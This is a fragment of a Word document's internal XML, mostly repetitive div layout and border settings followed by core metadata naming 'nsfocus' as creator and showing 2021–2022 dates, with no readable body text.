      </w:divsChild>
    </w:div>
    <w:div w:id="1278830335">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1355502503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2008560269">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1355613524">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="945229884">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1448692276">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1143162704">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="14633795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626">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1471509742">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="977105203">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1472213608">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1154687254">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1503548080">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1527865129">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1539781091">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="121534188">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1569458579">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="109594948">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1585724731">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1501458455">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="17618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0025">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1571424122">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="19870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62">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1176921214">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="15508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2073">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1561089373">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1693605710">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="877085970">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1705907809">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="576941373">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1755012402">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1837107096">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849100013">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2081515457">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1868714002">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="823011907">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1874609545">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="216090021">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1914584449">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1961640382">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="158815067">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1973513587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1440030188">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2034652503">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1557933776">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2054380290">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2101442077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="52148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9</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nsfocus</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>nsfocus</cp:lastModifiedBy>
  <cp:revision>292</cp:revision>
  <cp:lastPrinted>2021-12-16T07:41:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-16T05:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-10T09:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>